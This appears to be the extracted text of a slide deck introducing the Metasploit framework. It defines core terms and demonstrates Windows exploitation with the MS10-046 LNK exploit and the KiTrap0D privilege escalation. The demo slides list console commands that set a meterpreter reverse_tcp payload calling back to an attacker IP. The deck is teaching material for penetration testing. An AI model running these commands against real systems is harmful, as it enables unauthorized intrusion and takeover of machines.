2. Introduction
• It is a free, open source penetration testing
framework started by H. D. Moore in 2003,
which was later acquired by Rapid7. The
current stable versions of the framework are
written using the Ruby language. It has the
world's largest database of tested exploits and
receives more than a million downloads every
year. It is also one of the most complex
projects built in Ruby to date.
3. Terminology
Vulnerability: It is a weakness which allows an attacker/pentester to break
into or compromise a system's security. This weakness can either exist in the
operating system, application software, or even in the network protocols.
Exploit: Exploit is a code which allows an attacker/tester to take advantage of
the vulnerable system and compromise its security. Every vulnerability has its
own corresponding exploit. Metasploit v4 has more than 1200 exploits.
Payload: It is the actual code which does the work. It runs on the system
after exploitation. They are mostly used to set up a connection between the
attacking and the victim machine. Metasploit v4 has more than 400 payloads.
Module: Modules are the small building blocks of a complete system. Every
module performs a specific task and a complete system is built by combining
several modules to function as a single unit. The biggest advantage of such an
architecture is that it becomes easy for developers to integrate a new exploit
code and tools into the framework.
4. Demo
• msfconsole
It provides an "all-in-one" centralized console
and allows you efficient access to virtually all
of the options available in the Metasploit
Framework.
5. Demo
• use
exploit/windows/browser/ms10_046_shortcut_
icon_dllloader
• Also, used in Stuxnet.
• This module exploits a vulnerability in the
handling of Windows Shortcut files (.LNK) that
contain an icon resource pointing to a malicious
DLL. This module creates a WebDAV service that
can be used to run an arbitrary payload when
accessed as a UNC path.
• CVE-2010-2568
13. Demo
• shell
• net user Rupam
This is a local admin. Now we will try to elevate
privileges to get SYSTEM level access.
14. Demo
• Background
• use exploit/windows/local/ [TAB TAB]
• use exploit/windows/local/ms10_015_kitrap0d
• This module will create a new session with
SYSTEM privileges via the KiTrap0D exlpoit by
Tavis Ormandy. If the session is use is already
elevated then the exploit will not run. The
module relies on kitrap0d.x86.dll, and is not
supported on x64 editions of Windows.
15. Demo
• set SESSION 1
• set
PAYLOAD windwos/meterpreter/reverse_tcp
• set LHOST 192.168.56.102
• set LPORT 4443
• show options
• exploit